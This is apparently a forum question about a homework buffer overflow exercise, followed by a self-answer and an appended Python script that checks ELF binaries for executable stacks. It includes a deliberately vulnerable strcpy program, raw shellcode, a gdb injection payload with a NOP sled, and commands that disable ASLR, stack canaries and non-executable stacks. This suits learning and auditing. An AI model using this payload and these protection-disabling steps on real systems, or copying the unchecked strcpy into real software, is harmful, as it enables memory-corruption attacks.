Homework - Cannot exploit buffer overflow

I am trying to learn to exploit a simple buffer overflow technique on Backtrack Linux.

Here is my C program:

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char buffer[500];
    if (argc == 2)
    {
        strcpy(buffer, argv[1]);  // vulnerable function: no length check on argv[1]
    }

    return 0;
}

This is the shellcode I am using, which corresponds to a simple /bin/ls:

\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x6e\x2f\x6c\x73\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80

I inject this shellcode in gdb using the following command:

run $(python -c 'print "\x90" * 331 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x6e\x2f\x6c\x73\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x0c\xd3\xff\xff"*35')

As I step through the application, it generates a segmentation fault on the final ret instruction. At that point EIP is correctly set to 0xffffd30c. This address is addressable and contains a series of NOPs, followed by my shellcode as shown in the payload.

I have disabled ASLR with: sudo echo 0 > /proc/sys/kernel/randomize_va_space

and also compiled my binary using the -fno-stack-protector option.

Any idea what's the cause of the SIGSEGV?

Madhur Ahuja asked Aug 06 '11 04:08


1 Answer

I have answered my own question: the problem was "Executable Stack Protection", wherein stack memory cannot be executed. This can be disabled in gcc as follows:

gcc -z execstack

Madhur Ahuja answered Sep 27 '22 21:09
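An added audit check, not part of the question or answer above: it parses a binary's ELF program headers and reports whether the binary was linked with an executable stack, which is exactly what `gcc -z execstack` does by setting the PF_X bit on the PT_GNU_STACK segment (and what the NX stack enforcement that caused the SIGSEGV keys off). `build_sample_elf64` is a constructed image for the demonstration, not a real binary; `check_file` can be pointed at a real one.

```python
import struct

PT_GNU_STACK = 0x6474E551      # p_type of the stack-permission program header
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4

def program_headers(data: bytes):
    """Yield (p_type, p_flags) for every program header in an ELF32/ELF64 image."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    ei_class, ei_data = data[4], data[5]              # 1/2 = ELF32/ELF64, 1/2 = LE/BE
    e = "<" if ei_data == 1 else ">"
    if ei_class == 2:
        (e_phoff,) = struct.unpack_from(e + "Q", data, 0x20)
        e_phentsize, e_phnum = struct.unpack_from(e + "HH", data, 0x36)
        flags_off = 4                                  # ELF64: p_flags follows p_type
    elif ei_class == 1:
        (e_phoff,) = struct.unpack_from(e + "I", data, 0x1C)
        e_phentsize, e_phnum = struct.unpack_from(e + "HH", data, 0x2A)
        flags_off = 24                                 # ELF32: p_flags sits after p_memsz
    else:
        raise ValueError("unknown ELF class")
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        (p_type,) = struct.unpack_from(e + "I", data, off)
        (p_flags,) = struct.unpack_from(e + "I", data, off + flags_off)
        yield p_type, p_flags

def stack_is_executable(data: bytes) -> bool:
    """True when PT_GNU_STACK carries PF_X (the effect of `gcc -z execstack`).
    A missing PT_GNU_STACK is no explicit opt-out, so it is reported as
    executable too: that was the historical x86 default and is the safe
    assumption for an audit."""
    for p_type, p_flags in program_headers(data):
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    return True

def check_file(path: str) -> bool:
    with open(path, "rb") as f:
        return stack_is_executable(f.read())

def build_sample_elf64(stack_flags: int, with_gnu_stack: bool = True) -> bytes:
    """Constructed sample: a 64-byte ELF64 header plus one PT_GNU_STACK entry
    (or none). Not a loadable binary, just enough for the parser to inspect."""
    phnum = 1 if with_gnu_stack else 0
    ehdr = (b"\x7fELF" + bytes([2, 1, 1]) + bytes(9)     # ELF64, little-endian, v1
            + struct.pack("<HHIQQQIHHHHHH", 2, 62, 1, 0, 64, 0, 0, 64, 56, phnum, 0, 0, 0))
    phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
    return ehdr + (phdr if with_gnu_stack else b"")
```

Running `check_file` over a set of installed binaries gives the same answer as `readelf -l | grep GNU_STACK`, which is the quick way to confirm whether a build accidentally shipped with `-z execstack`.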